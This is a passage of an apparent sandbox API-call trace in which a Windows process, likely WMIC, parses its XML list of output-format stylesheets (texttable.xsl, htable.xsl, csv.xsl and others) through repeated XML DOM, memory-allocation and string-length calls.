text=0x1ef5a0*="texttable.xsl") returned 0x0 [0255.159] IXMLDOMNode:get_attributes (in: This=0x220bd50, attributeMap=0x1ef598 | out: attributeMap=0x1ef598*=0x22078d0) returned 0x0 [0255.159] malloc (_Size=0x18) returned 0x2ac560 [0255.159] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x22078d0, name="KEYWORD", namedItem=0x1ef5a8 | out: namedItem=0x1ef5a8*=0x220a280) returned 0x0 [0255.160] free (_Block=0x2ac560) [0255.160] IXMLDOMNode:get_nodeValue (in: This=0x220a280, value=0x1ef5e0 | out: value=0x1ef5e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="TABLE", varVal2=0x4)) returned 0x0 [0255.160] malloc (_Size=0x18) returned 0x2ac560 [0255.160] malloc (_Size=0x18) returned 0x2ac580 [0255.160] malloc (_Size=0x30) returned 0x2a8080 [0255.160] IUnknown:Release (This=0x220bd50) returned 0x0 [0255.160] IUnknown:Release (This=0x22078d0) returned 0x0 [0255.160] IUnknown:Release (This=0x220a280) returned 0x0 [0255.160] IXMLDOMNodeList:get_item (in: This=0x2209cc0, index=1, listItem=0x1ef590 | out: listItem=0x1ef590*=0x220bd50) returned 0x0 [0255.160] IXMLDOMNode:get_text (in: This=0x220bd50, text=0x1ef5a0 | out: text=0x1ef5a0*="textvaluelist.xsl") returned 0x0 [0255.160] IXMLDOMNode:get_attributes (in: This=0x220bd50, attributeMap=0x1ef598 | out: attributeMap=0x1ef598*=0x22078d0) returned 0x0 [0255.160] malloc (_Size=0x18) returned 0x2ac5a0 [0255.160] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x22078d0, name="KEYWORD", namedItem=0x1ef5a8 | out: namedItem=0x1ef5a8*=0x220a280) returned 0x0 [0255.161] free (_Block=0x2ac5a0) [0255.161] IXMLDOMNode:get_nodeValue (in: This=0x220a280, value=0x1ef5e0 | out: value=0x1ef5e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="VALUE", varVal2=0x4)) returned 0x0 [0255.161] malloc (_Size=0x18) returned 0x2ac5a0 [0255.161] malloc (_Size=0x18) returned 0x2ac5c0 [0255.161] SysStringLen (param_1="VALUE") returned 0x5 [0255.161] SysStringLen (param_1="TABLE") returned 0x5 [0255.161] SysStringLen (param_1="TABLE") returned 0x5 [0255.161] SysStringLen (param_1="VALUE") returned 0x5 [0255.161] malloc (_Size=0x30) returned 0x2a80c0 [0255.161] IUnknown:Release (This=0x220bd50) returned 0x0 [0255.161] IUnknown:Release (This=0x22078d0) returned 0x0 [0255.161] IUnknown:Release (This=0x220a280) returned 0x0 [0255.161] IXMLDOMNodeList:get_item (in: This=0x2209cc0, index=2, listItem=0x1ef590 | out: listItem=0x1ef590*=0x220bd50) returned 0x0 [0255.161] IXMLDOMNode:get_text (in: This=0x220bd50, text=0x1ef5a0 | out: text=0x1ef5a0*="textvaluelist.xsl") returned 0x0 [0255.161] IXMLDOMNode:get_attributes (in: This=0x220bd50, attributeMap=0x1ef598 | out: attributeMap=0x1ef598*=0x22078d0) returned 0x0 [0255.161] malloc (_Size=0x18) returned 0x2ac5e0 [0255.162] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x22078d0, name="KEYWORD", namedItem=0x1ef5a8 | out: namedItem=0x1ef5a8*=0x220a280) returned 0x0 [0255.162] free (_Block=0x2ac5e0) [0255.162] IXMLDOMNode:get_nodeValue (in: This=0x220a280, value=0x1ef5e0 | out: value=0x1ef5e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="LIST", varVal2=0x4)) returned 0x0 [0255.162] malloc (_Size=0x18) returned 0x2ac5e0 [0255.162] malloc (_Size=0x18) returned 0x2ac600 [0255.162] SysStringLen (param_1="LIST") returned 0x4 [0255.162] SysStringLen (param_1="TABLE") returned 0x5 [0255.162] malloc (_Size=0x30) returned 0x2a8100 [0255.162] IUnknown:Release (This=0x220bd50) returned 0x0 [0255.162] IUnknown:Release (This=0x22078d0) returned 0x0 [0255.162] IUnknown:Release (This=0x220a280) returned 0x0 [0255.162] IXMLDOMNodeList:get_item (in: This=0x2209cc0, index=3, listItem=0x1ef590 | out: listItem=0x1ef590*=0x220bd50) returned 0x0 [0255.162] IXMLDOMNode:get_text (in: This=0x220bd50, text=0x1ef5a0 | out: text=0x1ef5a0*="rawxml.xsl") returned 0x0 [0255.162] IXMLDOMNode:get_attributes (in: This=0x220bd50, attributeMap=0x1ef598 | out: attributeMap=0x1ef598*=0x22078d0) returned 0x0 [0255.162] malloc (_Size=0x18) returned 0x2ac620 [0255.162] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x22078d0, name="KEYWORD", namedItem=0x1ef5a8 | out: namedItem=0x1ef5a8*=0x220a280) returned 0x0 [0255.163] free (_Block=0x2ac620) [0255.163] IXMLDOMNode:get_nodeValue (in: This=0x220a280, value=0x1ef5e0 | out: value=0x1ef5e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="RAWXML", varVal2=0x4)) returned 0x0 [0255.163] malloc (_Size=0x18) returned 0x2ac620 [0255.163] malloc (_Size=0x18) returned 0x2ac640 [0255.163] SysStringLen (param_1="RAWXML") returned 0x6 [0255.163] SysStringLen (param_1="TABLE") returned 0x5 [0255.163] SysStringLen (param_1="RAWXML") returned 0x6 [0255.163] SysStringLen (param_1="LIST") returned 0x4 [0255.163] SysStringLen (param_1="LIST") returned 0x4 [0255.163] SysStringLen (param_1="RAWXML") returned 0x6 [0255.163] malloc (_Size=0x30) returned 0x2a8140 [0255.163] IUnknown:Release (This=0x220bd50) returned 0x0 [0255.163] IUnknown:Release (This=0x22078d0) returned 0x0 [0255.163] IUnknown:Release (This=0x220a280) returned 0x0 [0255.163] IXMLDOMNodeList:get_item (in: This=0x2209cc0, index=4, listItem=0x1ef590 | out: listItem=0x1ef590*=0x220bd50) returned 0x0 [0255.163] IXMLDOMNode:get_text (in: This=0x220bd50, text=0x1ef5a0 | out: text=0x1ef5a0*="htable.xsl") returned 0x0 [0255.163] IXMLDOMNode:get_attributes (in: This=0x220bd50, attributeMap=0x1ef598 | out: attributeMap=0x1ef598*=0x22078d0) returned 0x0 [0255.163] malloc (_Size=0x18) returned 0x2ac660 [0255.163] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x22078d0, name="KEYWORD", namedItem=0x1ef5a8 | out: namedItem=0x1ef5a8*=0x220a280) returned 0x0 [0255.164] free (_Block=0x2ac660) [0255.164] IXMLDOMNode:get_nodeValue (in: This=0x220a280, value=0x1ef5e0 | out: value=0x1ef5e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="HTABLE", varVal2=0x4)) returned 0x0 [0255.164] malloc (_Size=0x18) returned 0x2ac660 [0255.164] malloc (_Size=0x18) returned 0x2ac680 [0255.164] SysStringLen (param_1="HTABLE") returned 0x6 [0255.164] SysStringLen (param_1="TABLE") returned 0x5 [0255.164] SysStringLen (param_1="HTABLE") returned 0x6 [0255.164] SysStringLen (param_1="LIST") returned 0x4 [0255.164] malloc (_Size=0x30) returned 0x2a8180 [0255.164] IUnknown:Release (This=0x220bd50) returned 0x0 [0255.164] IUnknown:Release (This=0x22078d0) returned 0x0 [0255.165] IUnknown:Release (This=0x220a280) returned 0x0 [0255.165] IXMLDOMNodeList:get_item (in: This=0x2209cc0, index=5, listItem=0x1ef590 | out: listItem=0x1ef590*=0x220bd50) returned 0x0 [0255.165] IXMLDOMNode:get_text (in: This=0x220bd50, text=0x1ef5a0 | out: text=0x1ef5a0*="hform.xsl") returned 0x0 [0255.165] IXMLDOMNode:get_attributes (in: This=0x220bd50, attributeMap=0x1ef598 | out: attributeMap=0x1ef598*=0x22078d0) returned 0x0 [0255.165] malloc (_Size=0x18) returned 0x2ac6a0 [0255.165] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x22078d0, name="KEYWORD", namedItem=0x1ef5a8 | out: namedItem=0x1ef5a8*=0x220a280) returned 0x0 [0255.165] free (_Block=0x2ac6a0) [0255.165] IXMLDOMNode:get_nodeValue (in: This=0x220a280, value=0x1ef5e0 | out: value=0x1ef5e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="HFORM", varVal2=0x4)) returned 0x0 [0255.165] malloc (_Size=0x18) returned 0x2ac6a0 [0255.165] malloc (_Size=0x18) returned 0x2ac6c0 [0255.165] SysStringLen (param_1="HFORM") returned 0x5 [0255.165] SysStringLen (param_1="TABLE") returned 0x5 [0255.165] SysStringLen (param_1="HFORM") returned 0x5 [0255.165] SysStringLen (param_1="LIST") returned 0x4 [0255.165] SysStringLen (param_1="HFORM") returned 0x5 [0255.165] SysStringLen (param_1="HTABLE") returned 0x6 [0255.165] malloc (_Size=0x30) returned 0x2a81c0 [0255.166] IUnknown:Release (This=0x220bd50) returned 0x0 [0255.166] IUnknown:Release (This=0x22078d0) returned 0x0 [0255.166] IUnknown:Release (This=0x220a280) returned 0x0 [0255.166] IXMLDOMNodeList:get_item (in: This=0x2209cc0, index=6, listItem=0x1ef590 | out: listItem=0x1ef590*=0x220bd50) returned 0x0 [0255.166] IXMLDOMNode:get_text (in: This=0x220bd50, text=0x1ef5a0 | out: text=0x1ef5a0*="xml.xsl") returned 0x0 [0255.166] IXMLDOMNode:get_attributes (in: This=0x220bd50, attributeMap=0x1ef598 | out: attributeMap=0x1ef598*=0x22078d0) returned 0x0 [0255.166] malloc (_Size=0x18) returned 0x2ac6e0 [0255.166] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x22078d0, name="KEYWORD", namedItem=0x1ef5a8 | out: namedItem=0x1ef5a8*=0x220a280) returned 0x0 [0255.166] free (_Block=0x2ac6e0) [0255.166] IXMLDOMNode:get_nodeValue (in: This=0x220a280, value=0x1ef5e0 | out: value=0x1ef5e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="XML", varVal2=0x4)) returned 0x0 [0255.166] malloc (_Size=0x18) returned 0x2ac6e0 [0255.166] malloc (_Size=0x18) returned 0x2ac700 [0255.166] SysStringLen (param_1="XML") returned 0x3 [0255.166] SysStringLen (param_1="TABLE") returned 0x5 [0255.166] SysStringLen (param_1="XML") returned 0x3 [0255.166] SysStringLen (param_1="VALUE") returned 0x5 [0255.166] SysStringLen (param_1="VALUE") returned 0x5 [0255.167] SysStringLen (param_1="XML") returned 0x3 [0255.167] malloc (_Size=0x30) returned 0x2a8200 [0255.167] IUnknown:Release (This=0x220bd50) returned 0x0 [0255.167] IUnknown:Release (This=0x22078d0) returned 0x0 [0255.167] IUnknown:Release (This=0x220a280) returned 0x0 [0255.167] IXMLDOMNodeList:get_item (in: This=0x2209cc0, index=7, listItem=0x1ef590 | out: listItem=0x1ef590*=0x220bd50) returned 0x0 [0255.167] IXMLDOMNode:get_text (in: This=0x220bd50, text=0x1ef5a0 | out: text=0x1ef5a0*="mof.xsl") returned 0x0 [0255.167] IXMLDOMNode:get_attributes (in: This=0x220bd50, attributeMap=0x1ef598 | out: attributeMap=0x1ef598*=0x22078d0) returned 0x0 [0255.167] malloc (_Size=0x18) returned 0x2ac720 [0255.167] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x22078d0, name="KEYWORD", namedItem=0x1ef5a8 | out: namedItem=0x1ef5a8*=0x220a280) returned 0x0 [0255.167] free (_Block=0x2ac720) [0255.167] IXMLDOMNode:get_nodeValue (in: This=0x220a280, value=0x1ef5e0 | out: value=0x1ef5e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MOF", varVal2=0x4)) returned 0x0 [0255.167] malloc (_Size=0x18) returned 0x2ac720 [0255.167] malloc (_Size=0x18) returned 0x2ac740 [0255.167] SysStringLen (param_1="MOF") returned 0x3 [0255.167] SysStringLen (param_1="TABLE") returned 0x5 [0255.167] SysStringLen (param_1="MOF") returned 0x3 [0255.167] SysStringLen (param_1="LIST") returned 0x4 [0255.168] SysStringLen (param_1="MOF") returned 0x3 [0255.168] SysStringLen (param_1="RAWXML") returned 0x6 [0255.168] SysStringLen (param_1="LIST") returned 0x4 [0255.168] SysStringLen (param_1="MOF") returned 0x3 [0255.168] malloc (_Size=0x30) returned 0x2a8240 [0255.168] IUnknown:Release (This=0x220bd50) returned 0x0 [0255.168] IUnknown:Release (This=0x22078d0) returned 0x0 [0255.168] IUnknown:Release (This=0x220a280) returned 0x0 [0255.168] IXMLDOMNodeList:get_item (in: This=0x2209cc0, index=8, listItem=0x1ef590 | out: listItem=0x1ef590*=0x220bd50) returned 0x0 [0255.168] IXMLDOMNode:get_text (in: This=0x220bd50, text=0x1ef5a0 | out: text=0x1ef5a0*="csv.xsl") returned 0x0 [0255.168] IXMLDOMNode:get_attributes (in: This=0x220bd50, attributeMap=0x1ef598 | out: attributeMap=0x1ef598*=0x22078d0) returned 0x0 [0255.168] malloc (_Size=0x18) returned 0x2ac760 [0255.168] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x22078d0, name="KEYWORD", namedItem=0x1ef5a8 | out: namedItem=0x1ef5a8*=0x220a280) returned 0x0 [0255.168] free (_Block=0x2ac760) [0255.168] IXMLDOMNode:get_nodeValue (in: This=0x220a280, value=0x1ef5e0 | out: value=0x1ef5e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CSV", varVal2=0x4)) returned 0x0 [0255.168] malloc (_Size=0x18) returned 0x2ac760 [0255.168] malloc (_Size=0x18) returned 0x2ac780 [0255.169] SysStringLen (param_1="CSV") returned 0x3 [0255.169] SysStringLen (param_1="TABLE") returned 0x5 [0255.169] SysStringLen (param_1="CSV") returned 0x3 [0255.169] SysStringLen (param_1="LIST") returned 0x4 [0255.169] SysStringLen (param_1="CSV") returned 0x3 [0255.169] SysStringLen (param_1="HTABLE") returned 0x6 [0255.169] SysStringLen (param_1="CSV") returned 0x3 [0255.169] SysStringLen (param_1="HFORM") returned 0x5 [0255.169] malloc (_Size=0x30) returned 0x2a8280 [0255.169] IUnknown:Release (This=0x220bd50) returned 0x0 [0255.169] IUnknown:Release (This=0x22078d0) returned 0x0 [0255.169] IUnknown:Release (This=0x220a280) returned 0x0 [0255.169] IXMLDOMNodeList:get_item (in: This=0x2209cc0, index=9, listItem=0x1ef590 | out: listItem=0x1ef590*=0x220bd50) returned 0x0 [0255.169] IXMLDOMNode:get_text (in: This=0x220bd50, text=0x1ef5a0 | out: text=0x1ef5a0*="texttable.xsl") returned 0x0 [0255.169] IXMLDOMNode:get_attributes (in: This=0x220bd50, attributeMap=0x1ef598 | out: attributeMap=0x1ef598*=0x22078d0) returned 0x0 [0255.169] malloc (_Size=0x18) returned 0x2ac7a0 [0255.169] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x22078d0, name="KEYWORD", namedItem=0x1ef5a8 | out: namedItem=0x1ef5a8*=0x220a280) returned 0x0 [0255.169] free (_Block=0x2ac7a0) [0255.169] IXMLDOMNode:get_nodeValue (in: This=0x220a280, value=0x1ef5e0 | out: value=0x1ef5e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="texttablewsys.xsl", varVal2=0x4)) returned 0x0 [0255.170] malloc (_Size=0x18) returned 0x2ac7a0 [0255.170] malloc (_Size=0x18) returned 0x2ac7c0 [0255.170] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0255.170] SysStringLen (param_1="TABLE") returned 0x5 [0255.170] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0255.170] SysStringLen (param_1="VALUE") returned 0x5 [0255.170] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0255.170] SysStringLen (param_1="XML") returned 0x3 [0255.170] SysStringLen (param_1="XML") returned 0x3 [0255.170] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0255.170] malloc (_Size=0x30) returned 0x2a82c0 [0255.170] IUnknown:Release (This=0x220bd50) returned 0x0 [0255.170] IUnknown:Release (This=0x22078d0) returned 0x0 [0255.170] IUnknown:Release (This=0x220a280) returned 0x0 [0255.170] IXMLDOMNodeList:get_item (in: This=0x2209cc0, index=10, listItem=0x1ef590 | out: listItem=0x1ef590*=0x220bd50) returned 0x0 [0255.170] IXMLDOMNode:get_text (in: This=0x220bd50, text=0x1ef5a0 | out: text=0x1ef5a0*="texttable.xsl") returned 0x0 [0255.170] IXMLDOMNode:get_attributes (in: This=0x220bd50, attributeMap=0x1ef598 | out: attributeMap=0x1ef598*=0x22078d0) returned 0x0 [0255.170] malloc (_Size=0x18) returned 0x2ac7e0 [0255.170] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x22078d0, name="KEYWORD", namedItem=0x1ef5a8 | out: namedItem=0x1ef5a8*=0x220a280) returned 0x0 [0255.171] free (_Block=0x2ac7e0) [0255.171] IXMLDOMNode:get_nodeValue (in: This=0x220a280, value=0x1ef5e0 | out: value=0x1ef5e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="texttablewsys", varVal2=0x4)) returned 0x0 [0255.171] malloc (_Size=0x18) returned 0x2ac7e0 [0255.171] malloc (_Size=0x18) returned 0x2ac800 [0255.171] SysStringLen (param_1="texttablewsys") returned 0xd [0255.171] SysStringLen (param_1="TABLE") returned 0x5 [0255.171] SysStringLen (param_1="texttablewsys") returned 0xd [0255.171] SysStringLen (param_1="XML") returned 0x3 [0255.171] SysStringLen (param_1="texttablewsys") returned 0xd [0255.171] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0255.171] SysStringLen (param_1="XML") returned 0x3 [0255.171] SysStringLen (param_1="texttablewsys") returned 0xd [0255.171] malloc (_Size=0x30) returned 0x2a8300 [0255.171] IUnknown:Release (This=0x220bd50) returned 0x0 [0255.171] IUnknown:Release (This=0x22078d0) returned 0x0 [0255.171] IUnknown:Release (This=0x220a280) returned 0x0 [0255.171] IXMLDOMNodeList:get_item (in: This=0x2209cc0, index=11, listItem=0x1ef590 | out: listItem=0x1ef590*=0x220bd50) returned 0x0 [0255.171] IXMLDOMNode:get_text (in: This=0x220bd50, text=0x1ef5a0 | out: text=0x1ef5a0*="texttable.xsl") returned 0x0 [0255.171] IXMLDOMNode:get_attributes (in: This=0x220bd50, attributeMap=0x1ef598 | out: attributeMap=0x1ef598*=0x22078d0) returned 0x0 [0255.171] malloc (_Size=0x18) returned 0x2ac820 [0255.172] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x22078d0, name="KEYWORD", namedItem=0x1ef5a8 | out: namedItem=0x1ef5a8*=0x220a280) returned 0x0 [0255.172] free (_Block=0x2ac820) [0255.172] IXMLDOMNode:get_nodeValue (in: This=0x220a280, value=0x1ef5e0 | out: value=0x1ef5e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformat.xsl", varVal2=0x4)) returned 0x0 [0255.172] malloc (_Size=0x18) returned 0x2ac820 [0255.172] malloc (_Size=0x18) returned 0x2ac840 [0255.172] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0255.172] SysStringLen (param_1="TABLE") returned 0x5 [0255.172] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0255.172] SysStringLen (param_1="XML") returned 0x3 [0255.172] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0255.172] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0255.172] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0255.172] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0255.172] malloc (_Size=0x30) returned 0x2a8340 [0255.172] IUnknown:Release (This=0x220bd50) returned 0x0 [0255.172] IUnknown:Release (This=0x22078d0) returned 0x0 [0255.172] IUnknown:Release (This=0x220a280) returned 0x0 [0255.172] IXMLDOMNodeList:get_item (in: This=0x2209cc0, index=12, listItem=0x1ef590 | out: listItem=0x1ef590*=0x220bd50) returned 0x0 [0255.172] IXMLDOMNode:get_text (in: This=0x220bd50, text=0x1ef5a0 | out: text=0x1ef5a0*="texttable.xsl") returned 0x0 [0255.173] IXMLDOMNode:get_attributes (in: This=0x220bd50, attributeMap=0x1ef598 | out: attributeMap=0x1ef598*=0x22078d0) returned 0x0 [0255.173] malloc (_Size=0x18) returned 0x2ac860 [0255.173] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x22078d0, name="KEYWORD", namedItem=0x1ef5a8 | out: namedItem=0x1ef5a8*=0x220a280) returned 0x0 [0255.173] free (_Block=0x2ac860) [0255.173] IXMLDOMNode:get_nodeValue (in: This=0x220a280, value=0x1ef5e0 | out: value=0x1ef5e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformat", varVal2=0x4)) returned 0x0 [0255.173] malloc (_Size=0x18) returned 0x2ac860 [0255.173] malloc (_Size=0x18) returned 0x2ac880 [0255.173] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0255.173] SysStringLen (param_1="TABLE") returned 0x5 [0255.173] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0255.173] SysStringLen (param_1="XML") returned 0x3 [0255.173] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0255.173] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0255.173] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0255.173] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0255.173] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0255.173] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0255.173] malloc (_Size=0x30) returned 0x2a8380 [0255.173] IUnknown:Release (This=0x220bd50) returned 0x0 [0255.174] IUnknown:Release (This=0x22078d0) returned 0x0 [0255.174] IUnknown:Release (This=0x220a280) returned 0x0 [0255.174] IXMLDOMNodeList:get_item (in: This=0x2209cc0, index=13, listItem=0x1ef590 | out: listItem=0x1ef590*=0x220bd50) returned 0x0 [0255.174] IXMLDOMNode:get_text (in: This=0x220bd50, text=0x1ef5a0 | out: text=0x1ef5a0*="texttable.xsl") returned 0x0 [0255.174] IXMLDOMNode:get_attributes (in: This=0x220bd50, attributeMap=0x1ef598 | out: attributeMap=0x1ef598*=0x22078d0) returned 0x0 [0255.174] malloc (_Size=0x18) returned 0x2ac8a0 [0255.174] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x22078d0, name="KEYWORD", namedItem=0x1ef5a8 | out: namedItem=0x1ef5a8*=0x220a280) returned 0x0 [0255.174] free (_Block=0x2ac8a0) [0255.174] IXMLDOMNode:get_nodeValue (in: This=0x220a280, value=0x1ef5e0 | out: value=0x1ef5e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformatnosys.xsl", varVal2=0x4)) returned 0x0 [0255.174] malloc (_Size=0x18) returned 0x2ac8a0 [0255.174] malloc (_Size=0x18) returned 0x2ac8c0 [0255.174] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0255.174] SysStringLen (param_1="TABLE") returned 0x5 [0255.174] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0255.174] SysStringLen (param_1="XML") returned 0x3 [0255.174] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0255.174] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0255.174] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0255.174] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0255.175] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0255.175] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0255.175] malloc (_Size=0x30) returned 0x2a83c0 [0255.175] IUnknown:Release (This=0x220bd50) returned 0x0 [0255.175] IUnknown:Release (This=0x22078d0) returned 0x0 [0255.175] IUnknown:Release (This=0x220a280) returned 0x0 [0255.175] IXMLDOMNodeList:get_item (in: This=0x2209cc0, index=14, listItem=0x1ef590 | out: listItem=0x1ef590*=0x220bd50) returned 0x0 [0255.175] IXMLDOMNode:get_text (in: This=0x220bd50, text=0x1ef5a0 | out: text=0x1ef5a0*="texttable.xsl") returned 0x0 [0255.175] IXMLDOMNode:get_attributes (in: This=0x220bd50, attributeMap=0x1ef598 | out: attributeMap=0x1ef598*=0x22078d0) returned 0x0 [0255.175] malloc (_Size=0x18) returned 0x2ac8e0 [0255.175] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x22078d0, name="KEYWORD", namedItem=0x1ef5a8 | out: namedItem=0x1ef5a8*=0x220a280) returned 0x0 [0255.175] free (_Block=0x2ac8e0) [0255.175] IXMLDOMNode:get_nodeValue (in: This=0x220a280, value=0x1ef5e0 | out: value=0x1ef5e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformatnosys", varVal2=0x4)) returned 0x0 [0255.175] malloc (_Size=0x18) returned 0x2ac8e0 [0255.175] malloc (_Size=0x18) returned 0x2ac900 [0255.175] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0255.175] SysStringLen (param_1="TABLE") returned 0x5 [0255.175] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0255.176] SysStringLen (param_1="XML") returned 0x3 [0255.176] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0255.176] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0255.176] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0255.176] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0255.176] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0255.176] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0255.176] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0255.176] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0255.176] malloc (_Size=0x30) returned 0x2a8400 [0255.176] IUnknown:Release (This=0x220bd50) returned 0x0 [0255.176] IUnknown:Release (This=0x22078d0) returned 0x0 [0255.176] IUnknown:Release (This=0x220a280) returned 0x0 [0255.176] IXMLDOMNodeList:get_item (in: This=0x2209cc0, index=15, listItem=0x1ef590 | out: listItem=0x1ef590*=0x220bd50) returned 0x0 [0255.176] IXMLDOMNode:get_text (in: This=0x220bd50, text=0x1ef5a0 | out: text=0x1ef5a0*="htable.xsl") returned 0x0 [0255.176] IXMLDOMNode:get_attributes (in: This=0x220bd50, attributeMap=0x1ef598 | out: attributeMap=0x1ef598*=0x22078d0) returned 0x0 [0255.176] malloc (_Size=0x18) returned 0x2ac920 [0255.176] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x22078d0, name="KEYWORD", namedItem=0x1ef5a8 | out: namedItem=0x1ef5a8*=0x220a280) returned 0x0 [0255.176] free (_Block=0x2ac920) [0255.177] IXMLDOMNode:get_nodeValue (in: This=0x220a280, value=0x1ef5e0 | out: value=0x1ef5e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="htable-sortby.xsl", varVal2=0x4)) returned 0x0 [0255.177] malloc (_Size=0x18) returned 0x2ac920 [0255.177] malloc (_Size=0x18) returned 0x2ac940 [0255.177] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0255.177] SysStringLen (param_1="TABLE") returned 0x5 [0255.177] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0255.177] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0255.177] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0255.177] SysStringLen (param_1="XML") returned 0x3 [0255.177] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0255.177] SysStringLen (param_1="texttablewsys") returned 0xd [0255.177] SysStringLen (param_1="XML") returned 0x3 [0255.177] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0255.177] malloc (_Size=0x30) returned 0x2a8440 [0255.177] IUnknown:Release (This=0x220bd50) returned 0x0 [0255.177] IUnknown:Release (This=0x22078d0) returned 0x0 [0255.177] IUnknown:Release (This=0x220a280) returned 0x0 [0255.177] IXMLDOMNodeList:get_item (in: This=0x2209cc0, index=16, listItem=0x1ef590 | out: listItem=0x1ef590*=0x220bd50) returned 0x0 [0255.177] IXMLDOMNode:get_text (in: This=0x220bd50, text=0x1ef5a0 | out: text=0x1ef5a0*="htable.xsl") returned 0x0 [0255.177] IXMLDOMNode:get_attributes (in: This=0x220bd50, attributeMap=0x1ef598 | out: attributeMap=0x1ef598*=0x22078d0) returned 0x0 [0255.177] malloc (_Size=0x18) returned 0x2ac960 [0255.178] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x22078d0, name="KEYWORD", namedItem=0x1ef5a8 | out: namedItem=0x1ef5a8*=0x220a280) returned 0x0 [0255.178] free (_Block=0x2ac960) [0255.178] IXMLDOMNode:get_nodeValue (in: This=0x220a280, value=0x1ef5e0 | out: value=0x1ef5e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="htable-sortby", varVal2=0x4)) returned 0x0 [0255.178] malloc (_Size=0x18) returned 0x2ac960 [0255.178] malloc (_Size=0x18) returned 0x2ac980 [0255.178] SysStringLen (param_1="htable-sortby") returned 0xd [0255.178] SysStringLen (param_1="TABLE") returned 0x5 [0255.178] SysStringLen (param_1="htable-sortby") returned 0xd [0255.178] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0255.178] SysStringLen (param_1="htable-sortby") returned 0xd [0255.178] SysStringLen (param_1="XML") returned 0x3 [0255.178] SysStringLen (param_1="htable-sortby") returned 0xd [0255.178] SysStringLen (param_1="texttablewsys") returned 0xd [0255.178] SysStringLen (param_1="htable-sortby") returned 0xd [0255.178] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0255.178] SysStringLen 